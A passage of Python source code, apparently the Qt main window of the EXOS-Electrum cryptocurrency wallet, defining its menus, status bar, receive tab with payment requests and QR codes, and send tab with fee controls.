_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main EXOS network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("EXOS-Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent) # sanity check: the stored list must be sortable, otherwise reset it
except Exception:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# On macOS "Settings"/"Preferences" are reserved menu item names, so an app-specific label is used as a workaround
tools_menu.addAction(_("EXOS-Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://economy.openexo.com"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("https://economy.openexo.com/docs")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('exos:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "EXOS-Electrum",
(_("Version")+" %s" % ELECTRUM_BUILD + "\n\n" +
_("EXOS-Electrum's focus is speed, with low resource usage and simplicity.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are fast because it operates in conjunction with high-performance "
"servers that handle the many complicated parts of the EXOS system.") + "\n\n" +
_("This software uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/exoeconomy/exos-electrum/issues\">https://github.com/exoeconomy/EXOS-electrum/issues</a><br/><br/>",
_("Before reporting a bug, please upgrade to the most recent version of EXOS-Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs. The more detail you provide, the better the team will be able to help.")
])
self.show_message(msg, title="EXOS-Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("EXOS-Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("EXOS-Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter=""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter=""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in exo/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' exo/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
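# Worked example (added for clarity; values hypothetical): the conversion used in
# edit_changed above, with `rate` quoted as fiat per whole coin and COIN = 10**8.
#
#   rate, fiat = Decimal('2.50'), Decimal('10')  # 10 fiat units at 2.50 per coin
#   sats = int(fiat / rate * COIN)               # -> 400000000, i.e. 4 coins
#   assert Decimal(sats) * rate / COIN == Decimal('10')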
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('EXOS address where the payment should be received. Note that each payment request uses a different EXOS address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding EXOS addresses.'),
_('The EXOS address never expires and will always be part of this EXOS-Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(True)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
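# Builds a BIP21-style payment URI from a stored request. Illustrative shape
# only (fields vary per request): exos:<address>?amount=...&time=...&exp=...,
# with 'name' and 'sig' (base58) appended for signed requests.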
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
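# Sign the request with the configured alias key, but only when the alias
# resolves to an address this wallet owns; prompt for the password first if
# the keystore is encrypted.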
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = expiration_values[i][1]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet that cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} exos are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter an EXOS address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to an EXOS address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('EXOS transactions are not free. A transaction fee is paid by the sender of the funds. The fee is collected by the staker who forges the block containing the transaction.') + '\n\n'\
+ _('The amount of the fee can be decided freely by the sender. However, transactions with low fees take more time to be processed. Transactions with fees less than 0.0001 EXOS will be rejected.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size, in bytes, of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
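# Fee slider callback: in dynamic mode persist the chosen mempool depth or fee
# level; in static mode persist fee_per_kb and mirror it into the feerate edit
# (config stores exo/kB while the edit shows exo/byte, hence the / 1000).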
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
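# Keep the absolute-fee and feerate edits mutually exclusive: whichever one
# the user edited last stays 'modified' (frozen) and the other is recomputed;
# the slider is deactivated so manual input takes precedence.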
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, EXOS-Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 exos might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
# hide the advanced fee controls unless the user has opted in via 'show_fee'
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
